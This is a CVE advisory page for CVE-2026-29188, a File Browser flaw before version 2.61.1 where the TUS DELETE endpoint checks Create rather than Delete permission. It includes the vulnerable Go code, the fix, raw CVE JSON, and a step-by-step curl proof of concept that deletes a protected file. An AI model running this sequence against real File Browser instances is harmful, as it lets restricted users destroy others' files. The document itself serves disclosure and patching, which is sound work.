← Back
2026-03-05 20:57CVE-2026-29188GitHub_M
PUBLISHED5.2CWE-732CWE-284

File Browser: TUS Delete Endpoint Bypasses Delete Permission Check

File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1.

Problem type

Affected products

filebrowser

filebrowser

< 2.61.1 - AFFECTED

References

https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm

https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm

x_refsource_CONFIRM
https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f

https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f

x_refsource_MISC
https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1

https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1

x_refsource_MISC

GitHub Security Advisories

GHSA-79pf-vx4x-7jmm

File Browser's TUS Delete Endpoint Bypasses Delete Permission Check

https://github.com/advisories/GHSA-79pf-vx4x-7jmm

Summary

A broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected.

Details

The tusDeleteHandler function in http/tus_handlers.go incorrectly gates the DELETE operation behind Perm.Create instead of Perm.Delete:

// http/tus_handlers.go - tusDeleteHandler (VULNERABLE)
func tusDeleteHandler(cache UploadCache) handleFunc {
    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
        if r.URL.Path == "/" || !d.user.Perm.Create {  // ← Wrong permission checked
            return http.StatusForbidden, nil
        }
        // ...
        err = d.user.Fs.RemoveAll(r.URL.Path)  // File is deleted

The correct resourceDeleteHandler in http/resource.go properly checks Perm.Delete:

// http/resource.go - resourceDeleteHandler (CORRECT)
func resourceDeleteHandler(fileCache FileCache) handleFunc {
    return withUser(func(_ http.ResponseWriter, r *http.Request, d *data) (int, error) {
        if r.URL.Path == "/" || !d.user.Perm.Delete {  // ← Correct permission
            return http.StatusForbidden, nil
        }

This inconsistency means that DELETE /api/tus/{path} and DELETE /api/resources/{path} enforce entirely different permission models for the same underlying filesystem operation. The TUS endpoint was introduced to support resumable uploads (http/tus_handlers.go) and its DELETE handler is intended to cancel in-progress uploads -however, the RemoveAll call permanently removes the file from the filesystem regardless of how the upload was initiated.

Proposed fix:

// http/tus_handlers.go
- if r.URL.Path == "/" || !d.user.Perm.Create {
+ if r.URL.Path == "/" || !d.user.Perm.Delete {

PoC

Setup section

# Build and initialize
git clone https://github.com/filebrowser/filebrowser
cd filebrowser
go build -o filebrowser .
./filebrowser config init

# Create a test user with Create=true but Delete=false
./filebrowser users add testuser SuperSecurePassword1234 \
  --perm.create=true \
  --perm.delete=false

# Start server
./filebrowser &

POC script steps

  1. Confirm the Delete permission is correctly enforced on the standard endpoint:
TOKEN=$(curl -s -X POST localhost:8080/api/login \
  -H "Content-Type: application/json" \
  -d '{"username":"testuser","password":"SuperSecurePassword1234"}')

# Attempt deletion via the standard resource endpoint → should be blocked
curl -s -X DELETE "localhost:8080/api/resources/target.txt" \
  -H "X-Auth: $TOKEN" \
  -w "HTTP Status: %{http_code}\n"

# Expected: HTTP Status: 403
  1. Bypass via the TUS Delete endpoint:
# Initiate a TUS upload to register the file in the upload cache
curl -s -X POST "localhost:8080/api/tus/target.txt" \
  -H "X-Auth: $TOKEN" \
  -H "Upload-Length: 18" \
  -w "HTTP Status: %{http_code}\n"

# Expected: HTTP Status: 201

# Now delete via the TUS endpoint - Perm.Delete is NOT checked
curl -s -X DELETE "localhost:8080/api/tus/target.txt" \
  -H "X-Auth: $TOKEN" \
  -w "HTTP Status: %{http_code}\n"

# Expected: HTTP Status: 204  ← File deleted despite Perm.Delete=false

Observed results:

DELETE /api/resources/target.txt  -->  403 Forbidden      ( permission enforced )
DELETE /api/tus/target.txt            -->   204 No Content    ( permission bypassed )

Impact

This is a broken access control vulnerability (IDOR / permission model bypass). It affects any filebrowser deployment where:

  • Multiple users share a single instance, and
  • An administrator has explicitly set Perm.Delete=false for one or more users to restrict destructive operations

An attacker (authenticated user with Perm.Create=true) can permanently delete any file or directory within their assigned scope-including files they did not create - by initiating a TUS upload against the target path and immediately issuing a TUS DELETE request. This completely undermines the intended access control model, as administrators have no reliable way to prevent file deletion for users who retain upload rights.

github.com

https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm

github.com

https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f

nvd.nist.gov

https://nvd.nist.gov/vuln/detail/CVE-2026-29188

github.com

https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1

github.com

https://github.com/advisories/GHSA-79pf-vx4x-7jmm

JSON source

https://cveawg.mitre.org/api/cve/CVE-2026-29188
Click to expand
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-29188",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-03-05T20:57:57.329Z",
    "dateReserved": "2026-03-04T14:44:00.714Z",
    "datePublished": "2026-03-05T20:57:57.329Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-03-05T20:57:57.329Z"
      },
      "title": "File Browser: TUS Delete Endpoint Bypasses Delete Permission Check",
      "descriptions": [
        {
          "lang": "en",
          "value": "File Browser provides a file managing interface within a specified directory and it can be used to upload, delete, preview, rename and edit files. Prior to version 2.61.1, a broken access control vulnerability in the TUS protocol DELETE endpoint allows authenticated users with only Create permission to delete arbitrary files and directories within their scope, bypassing the intended Delete permission restriction. Any multi-user deployment where administrators explicitly restrict file deletion for certain users is affected. This issue has been patched in version 2.61.1."
        }
      ],
      "affected": [
        {
          "vendor": "filebrowser",
          "product": "filebrowser",
          "versions": [
            {
              "version": "< 2.61.1",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-732: Incorrect Permission Assignment for Critical Resource",
              "cweId": "CWE-732",
              "type": "CWE"
            }
          ]
        },
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-284: Improper Access Control",
              "cweId": "CWE-284",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm",
          "name": "https://github.com/filebrowser/filebrowser/security/advisories/GHSA-79pf-vx4x-7jmm",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        },
        {
          "url": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f",
          "name": "https://github.com/filebrowser/filebrowser/commit/7ed1425115be602c2b23236c410098ea2d74b42f",
          "tags": [
            "x_refsource_MISC"
          ]
        },
        {
          "url": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1",
          "name": "https://github.com/filebrowser/filebrowser/releases/tag/v2.61.1",
          "tags": [
            "x_refsource_MISC"
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL"
          }
        }
      ]
    }
  }
}